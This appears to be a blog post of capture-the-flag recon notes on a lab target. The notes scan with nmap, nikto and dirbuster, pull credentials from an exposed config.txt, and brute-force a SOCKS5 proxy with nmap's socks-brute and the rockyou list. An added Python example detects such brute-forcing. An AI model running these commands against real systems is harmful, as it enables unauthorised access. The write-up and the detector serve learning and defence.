
Base CTF Recipe

duffle bag for pen test

Raw Notes


Recon

nmap scan reveals two open ports

| Port | Status | Info |
|------|--------|------|
| 80 | open | http (web application) |
| 1080 | open | socks (socks5 proxy requiring authentication) |

  • nikto -h [ip address]

reveals more about the web application such as the version

  • dirbuster [web application] (needs the SecLists wordlist /big.txt)

--> webapp.local/adminpanel

--> webapp.local/config.txt

This config.txt reveals username: prime, password: temppassword

  • curl -x socks5://Prime:temppassword@[ipaddress]:1080/ http://[webapp.local]
  • echo "Prime" > "user.txt"

nmap

Attempt an nmap script brute force when the temporary password doesn't work with curl

  • nmap --script socks-brute --script-args userdb=./user.txt,passdb=/usr/share/seclists/Passwords/LeakedDictionaries/rockyou.txt -p 1080 [ipaddress] -v

--> Port State Service

1080/tcp open Socks

| socks-brute accounts: Prime:tinkerbell1

curl again

  • curl -x socks5://Prime:tinkerbell1@[ipaddress]:1080/ http://[webapp.local]
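
What the socks-brute run above looks like from the proxy side, as an added example that is not part of the original notes: SOCKS5 username/password authentication (RFC 1929) sends both fields unencrypted and answers every attempt with a one-byte status, so failed logins per source and username are easy to count. The sample exchanges, the documentation IP addresses, the threshold of 3 and all function names are assumptions made for this illustration.

```python
from collections import defaultdict

def build_request(user: str, passwd: str) -> bytes:
    """Client message: VER(0x01) ULEN UNAME PLEN PASSWD, all unencrypted."""
    u, p = user.encode(), passwd.encode()
    return bytes([0x01, len(u)]) + u + bytes([len(p)]) + p

def parse_auth_request(data: bytes):
    """Return (user, password) from a client auth message, or raise ValueError."""
    if len(data) < 3 or data[0] != 0x01:
        raise ValueError("not an RFC 1929 auth request")
    ulen = data[1]
    if len(data) < 3 + ulen:
        raise ValueError("truncated username")
    plen = data[2 + ulen]
    user, passwd = data[2:2 + ulen], data[3 + ulen:3 + ulen + plen]
    if len(passwd) != plen:
        raise ValueError("truncated password")
    return user.decode("utf-8", "replace"), passwd.decode("utf-8", "replace")

def auth_succeeded(reply: bytes) -> bool:
    """Server reply: VER(0x01) STATUS; only STATUS 0x00 means success."""
    if len(reply) != 2 or reply[0] != 0x01:
        raise ValueError("not an RFC 1929 auth reply")
    return reply[1] == 0x00

def flag_bruteforce(exchanges, max_failures=3):
    """Count failed logins per (source, user); return pairs at/over the threshold."""
    failures = defaultdict(int)
    for src, request, reply in exchanges:
        user, _ = parse_auth_request(request)  # the password is not kept
        if not auth_succeeded(reply):
            failures[(src, user)] += 1
    return {key: n for key, n in failures.items() if n >= max_failures}

# Constructed sample exchanges (documentation addresses, made-up guesses).
SAMPLE = [
    ("203.0.113.7", build_request("Prime", "guess-one"), b"\x01\x01"),
    ("203.0.113.7", build_request("Prime", "guess-two"), b"\x01\x01"),
    ("198.51.100.4", build_request("alice", "typo"), b"\x01\x01"),
    ("203.0.113.7", build_request("Prime", "guess-three"), b"\x01\x01"),
    ("198.51.100.4", build_request("alice", "correct-horse"), b"\x01\x00"),
]

if __name__ == "__main__":
    for (src, user), n in flag_bruteforce(SAMPLE).items():
        print(f"{src} failed {n} logins as {user!r} on the SOCKS5 proxy")
```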
This post is licensed under CC BY 4.0 by the author.